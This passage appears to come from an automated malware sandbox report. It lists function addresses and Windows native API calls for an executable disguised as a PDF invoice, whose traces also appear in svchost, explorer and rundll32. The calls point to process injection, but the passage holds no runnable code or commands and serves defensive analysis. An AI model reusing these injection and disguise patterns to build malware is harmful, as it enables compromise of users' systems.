          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EA042 NtQueryInformationProcess,1_2_029EA042
          Source: C:\Windows\explorer.exeCode function: 2_2_0E614232 NtCreateFile,2_2_0E614232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E615E12 NtProtectVirtualMemory,2_2_0E615E12
          Source: C:\Windows\explorer.exeCode function: 2_2_0E615E0A NtProtectVirtualMemory,2_2_0E615E0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C25CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,3_2_00C25CF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C240B1 NtQuerySystemInformation,3_2_00C240B1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C25D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,3_2_00C25D6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00C24136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,3_2_00C24136
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04DB2CA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04DB2C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2C60 NtCreateKey,LdrInitializeThunk,3_2_04DB2C60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2DD0 NtDelayExecution,LdrInitializeThunk,3_2_04DB2DD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04DB2DF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04DB2D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_04DB2EA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2FE0 NtCreateFile,LdrInitializeThunk,3_2_04DB2FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2F30 NtCreateSection,LdrInitializeThunk,3_2_04DB2F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2AD0 NtReadFile,LdrInitializeThunk,3_2_04DB2AD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04DB2BF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04DB2BE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2B60 NtClose,LdrInitializeThunk,3_2_04DB2B60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB35C0 NtCreateMutant,LdrInitializeThunk,3_2_04DB35C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB4650 NtSuspendThread,3_2_04DB4650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB4340 NtSetContextThread,3_2_04DB4340
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2CC0 NtQueryVirtualMemory,3_2_04DB2CC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2CF0 NtOpenProcess,3_2_04DB2CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2C00 NtQueryInformationProcess,3_2_04DB2C00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2DB0 NtEnumerateKey,3_2_04DB2DB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2D00 NtSetInformationFile,3_2_04DB2D00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2D30 NtUnmapViewOfSection,3_2_04DB2D30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2EE0 NtQueueApcThread,3_2_04DB2EE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2E80 NtReadVirtualMemory,3_2_04DB2E80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2E30 NtWriteVirtualMemory,3_2_04DB2E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2F90 NtProtectVirtualMemory,3_2_04DB2F90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2FB0 NtResumeThread,3_2_04DB2FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2FA0 NtQuerySection,3_2_04DB2FA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2F60 NtCreateProcessEx,3_2_04DB2F60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2AF0 NtWriteFile,3_2_04DB2AF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2AB0 NtWaitForSingleObject,3_2_04DB2AB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2B80 NtQueryInformationFile,3_2_04DB2B80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB2BA0 NtEnumerateValueKey,3_2_04DB2BA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB3090 NtSetValueKey,3_2_04DB3090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB3010 NtOpenDirectoryObject,3_2_04DB3010
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB3D70 NtOpenThread,3_2_04DB3D70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB3D10 NtOpenProcessToken,3_2_04DB3D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB39B0 NtGetContextThread,3_2_04DB39B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5A3D0 NtReadFile,3_2_02C5A3D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5A320 NtCreateFile,3_2_02C5A320
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5A450 NtClose,3_2_02C5A450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5A500 NtAllocateVirtualMemory,3_2_02C5A500
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5A3CD NtReadFile,3_2_02C5A3CD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5A31A NtCreateFile,3_2_02C5A31A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02C5A44A NtClose,3_2_02C5A44A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BEA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,3_2_04BEA036
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BE9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,3_2_04BE9BAF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BEA042 NtQueryInformationProcess,3_2_04BEA042
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BE9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_04BE9BB2
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_007B4021
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007A8858
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007B545F
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077DBB50_2_0077DBB5
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0075E0600_2_0075E060
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007D804A0_2_007D804A
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007641400_2_00764140
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007724050_2_00772405
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007865220_2_00786522
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0078267E0_2_0078267E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007D06650_2_007D0665
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007668430_2_00766843
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077283A0_2_0077283A
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0075E8000_2_0075E800
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007889DF0_2_007889DF
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00768A0E0_2_00768A0E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007D0AE20_2_007D0AE2
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00786A940_2_00786A94
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B8B130_2_007B8B13
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007AEB070_2_007AEB07
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077CD610_2_0077CD61
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007870060_2_00787006
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0076710E0_2_0076710E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007631900_2_00763190
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007512870_2_00751287
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007733C70_2_007733C7
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077F4190_2_0077F419
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007716C40_2_007716C4
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007656800_2_00765680
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007778D30_2_007778D3
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007658C00_2_007658C0
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00771BB80_2_00771BB8
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00789D050_2_00789D05
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0075FE400_2_0075FE40
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_0077BFE60_2_0077BFE6
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_00771FD00_2_00771FD0
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_018D36400_2_018D3640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EB151_2_0041EB15
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E5611_2_0041E561
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D881_2_00402D88
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409E4B1_2_00409E4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409E501_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409E0A1_2_00409E0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EE981_2_0041EE98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041D7351_2_0041D735
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA3521_2_033FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034003E61_2_034003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E3F01_2_0334E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E02741_2_033E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C02C01_2_033C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA1181_2_033DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033301001_2_03330100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C81581_2_033C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F41A21_2_033F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034001AA1_2_034001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F81CC1_2_033F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D20001_2_033D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033407701_2_03340770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033647501_2_03364750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333C7C01_2_0333C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335C6E01_2_0335C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033405351_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034005911_2_03400591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E44201_2_033E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F24461_2_033F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EE4F61_2_033EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB401_2_033FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F6BD71_2_033F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA801_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033569621_2_03356962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A01_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340A9A61_2_0340A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334A8401_2_0334A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033428401_2_03342840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033268B81_2_033268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E8F01_2_0336E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360F301_2_03360F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E2F301_2_033E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03382F281_2_03382F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4F401_2_033B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BEFA01_2_033BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332FC81_2_03332FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FEE261_2_033FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340E591_2_03340E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352E901_2_03352E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FCE931_2_033FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FEEDB1_2_033FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DCD1F1_2_033DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334AD001_2_0334AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03358DBF1_2_03358DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333ADE01_2_0333ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340C001_2_03340C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0CB51_2_033E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330CF21_2_03330CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F132D1_2_033F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332D34C1_2_0332D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0338739A1_2_0338739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033452A01_2_033452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335D2F01_2_0335D2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E12ED1_2_033E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335B2C01_2_0335B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340B16B1_2_0340B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332F1721_2_0332F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337516C1_2_0337516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334B1B01_2_0334B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F70E91_2_033F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF0E01_2_033FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EF0CC1_2_033EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033470C01_2_033470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF7B01_2_033FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033856301_2_03385630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F16CC1_2_033F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DD5B01_2_033DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FF43F1_2_033FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033314601_2_03331460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFB761_2_033FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335FB801_2_0335FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B5BF01_2_033B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337DBF91_2_0337DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B3A6C1_2_033B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFA491_2_033FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F7A461_2_033F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DDAAC1_2_033DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03385AA01_2_03385AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E1AA31_2_033E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EDAC61_2_033EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D59101_2_033D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033499501_2_03349950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335B9501_2_0335B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AD8001_2_033AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFF091_2_033FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFFB11_2_033FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03341F921_2_03341F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03349EB01_2_03349EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F7D731_2_033F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F1D5A1_2_033F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03343D401_2_03343D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335FDC01_2_0335FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B9C321_2_033B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FFCF21_2_033FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EA0361_2_029EA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EB2321_2_029EB232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029E10821_2_029E1082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029EE5CD1_2_029EE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029E5B321_2_029E5B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029E5B301_2_029E5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029E89121_2_029E8912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_029E2D021_2_029E2D02
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6142322_2_0E614232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6130362_2_0E613036
          Source: C:\Windows\explorer.exeCode function: 2_2_0E60A0822_2_0E60A082
          Source: C:\Windows\explorer.exeCode function: 2_2_0E60EB302_2_0E60EB30
          Source: C:\Windows\explorer.exeCode function: 2_2_0E60EB322_2_0E60EB32
          Source: C:\Windows\explorer.exeCode function: 2_2_0E60BD022_2_0E60BD02
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6119122_2_0E611912
          Source: C:\Windows\explorer.exeCode function: 2_2_0E6175CD2_2_0E6175CD
          Source: C:\Windows\explorer.exeCode function: 2_2_10D1B0822_2_10D1B082
          Source: C:\Windows\explorer.exeCode function: 2_2_10D240362_2_10D24036
          Source: C:\Windows\explorer.exeCode function: 2_2_10D285CD2_2_10D285CD
          Source: C:\Windows\explorer.exeCode function: 2_2_10D229122_2_10D22912
          Source: C:\Windows\explorer.exeCode function: 2_2_10D1CD022_2_10D1CD02
          Source: C:\Windows\explorer.exeCode function: 2_2_10D252322_2_10D25232
          Source: C:\Windows\explorer.exeCode function: 2_2_10D1FB302_2_10D1FB30
          Source: C:\Windows\explorer.exeCode function: 2_2_10D1FB322_2_10D1FB32
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E2E4F63_2_04E2E4F6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E324463_2_04E32446
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E244203_2_04E24420
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E405913_2_04E40591
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D805353_2_04D80535
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D9C6E03_2_04D9C6E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D7C7C03_2_04D7C7C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DA47503_2_04DA4750
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D807703_2_04D80770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E120003_2_04E12000
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E381CC3_2_04E381CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E341A23_2_04E341A2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E401AA3_2_04E401AA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E081583_2_04E08158
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D701003_2_04D70100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E1A1183_2_04E1A118
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E002C03_2_04E002C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E202743_2_04E20274
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E403E63_2_04E403E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D8E3F03_2_04D8E3F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3A3523_2_04E3A352
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D70CF23_2_04D70CF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E20CB53_2_04E20CB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D80C003_2_04D80C00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D7ADE03_2_04D7ADE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D98DBF3_2_04D98DBF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D8AD003_2_04D8AD00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E1CD1F3_2_04E1CD1F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3EEDB3_2_04E3EEDB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D92E903_2_04D92E90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3CE933_2_04E3CE93
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D80E593_2_04D80E59
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3EE263_2_04E3EE26
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D72FC83_2_04D72FC8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DFEFA03_2_04DFEFA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DF4F403_2_04DF4F40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E22F303_2_04E22F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DA0F303_2_04DA0F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC2F283_2_04DC2F28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DAE8F03_2_04DAE8F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D668B83_2_04D668B8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D8A8403_2_04D8A840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D828403_2_04D82840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E4A9A63_2_04E4A9A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D829A03_2_04D829A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D969623_2_04D96962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D7EA803_2_04D7EA80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E36BD73_2_04E36BD7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3AB403_2_04E3AB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D714603_2_04D71460
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E3F43F3_2_04E3F43F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E495C33_2_04E495C3
